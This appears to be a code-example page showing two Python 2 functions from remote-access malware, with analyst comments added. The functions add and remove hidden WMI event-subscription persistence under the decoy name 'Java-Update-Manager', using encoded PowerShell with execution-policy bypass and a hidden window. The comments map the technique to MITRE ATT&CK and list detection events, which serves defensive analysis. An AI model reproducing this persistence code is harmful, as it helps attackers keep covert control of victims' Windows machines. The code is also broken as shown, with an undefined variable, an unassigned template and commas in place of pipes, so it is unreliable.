Esempio n. 1
def _add_powershell_wmi(command=None, name='Java-Update-Manager'):
    """Try to register a WMI event subscription called *name* through PowerShell.

    Runs only on Windows (``os.name == 'nt'``) and only when
    ``methods['powershell_wmi'].established`` is falsy. The command line
    stored in the subscription is either the running script itself
    (``sys.argv[0]``, when that path is a file) or *command* wrapped in an
    encoded PowerShell invocation.

    Returns ``(True, result)`` when a follow-up ``Get-WmiObject __eventFilter``
    query contains *name* in its output, otherwise ``(False, None)``. Every
    exception is logged through ``util.log`` and also yields ``(False, None)``.

    Analyst note: this is the WMI event-subscription persistence pattern
    (MITRE ATT&CK T1546.003). Subscriptions of this kind are recorded by
    Sysmon events 19/20/21 (filter, consumer, binding) and by event 5861 in
    the Microsoft-Windows-WMI-Activity/Operational log. The default *name*
    looks chosen to resemble a vendor updater, so name-based allow-listing
    is not a reliable control.
    """
    try:
        # `methods` is defined outside this block; only its `.established`
        # attribute is read here.
        if os.name == 'nt' and not methods['powershell_wmi'].established:
            cmd_line  = ""
            value = sys.argv[0]
            if value and os.path.isfile(value):
                # Relaunch the current script detached and minimised.
                cmd_line = 'start /b /min {}'.format(value)
            elif command:
                # Python 2 idiom: the command is encoded as UTF-16LE and then
                # base64, the form PowerShell's -encoded switch expects.
                # The switch set shown (-exec bypass, -window hidden, -noni,
                # -nop, -encoded) is a strong command-line detection signal
                # in process-creation logs (Security 4688 / Sysmon 1).
                cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(base64.b64encode(bytes(command).encode('UTF-16LE')))
            if cmd_line:
                # Condition text on Win32_PerfFormattedData_PerfOS_System
                # with SystemUpTime in [240, 325); presumably spliced into a
                # WQL query inside the template so the trigger fires shortly
                # after boot. The template is not visible here; confirm.
                startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
                # NOTE(review): as listed, the result of this replace chain
                # is not assigned, and `powershell` on the following line is
                # not defined in this block. Unless it exists as a global
                # elsewhere, the call raises NameError, which the outer
                # handler logs before the function returns (False, None).
		globals()['__Template_wmi'].replace('[STARTUP]', startup).replace('[COMMAND_LINE]', cmd_line).replace('[NAME]', name)
                util.powershell(powershell)
                # Verification query against root\subscription: success is
                # judged only by *name* appearing in the command output.
                code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name
                result = util.powershell(code)
                if name in result:
                    return (True, result)
    except Exception as e:
        # `func_name` exists only on Python 2 function objects.
        util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e)))
    return (False, None)
Esempio n. 2
def _remove_powershell_wmi(value=None, name='Java-Update-Manager'):
    """Run PowerShell intended to delete the WMI subscription called *name*.

    Acts only when ``methods['powershell_wmi'].established`` is truthy.
    Returns ``(False, None)`` when the PowerShell call produces no output;
    in every other case returns the current
    ``(methods['powershell_wmi'].established, methods['powershell_wmi'].result)``
    pair, which this block never modifies. *value* is accepted but unused.

    Analyst note: the three object classes referenced below (event filter,
    command-line event consumer, filter-to-consumer binding) are the
    artefacts to enumerate when hunting for or cleaning up this kind of
    persistence.
    """
    try:
        if methods['powershell_wmi'].established:
            try:
                # Targets __eventFilter, CommandLineEventConsumer and
                # __FilterToConsumerBinding in the root\subscription
                # namespace, with [NAME] replaced by *name*.
                # NOTE(review): a "," stands where a pipeline operator would
                # normally precede Remove-WmiObject / Where-Object; this may
                # be extraction damage on the page. As written, the script
                # may not remove anything. Verify against the upstream file.
                code = r"""
                Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'",  Remove-WmiObject
                Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" ,  Remove-WmiObject
                Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription ,  Where-Object { $_.filter -match '[NAME]'} ,  Remove-WmiObject""".replace('[NAME]', name)
                result = util.powershell(code)
                if not result:
                    return (False, None)
            # Bare except: any failure in the PowerShell call is silently
            # discarded, so a failed removal is indistinguishable from success.
            except: pass
        return (methods['powershell_wmi'].established, methods['powershell_wmi'].result)
    except Exception as e:
        # NOTE(review): the log label uses _add_powershell_wmi's name, so
        # errors from this function are attributed to the add routine.
        # `func_name` exists only on Python 2 function objects.
        util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e)))
    return (methods['powershell_wmi'].established, methods['powershell_wmi'].result)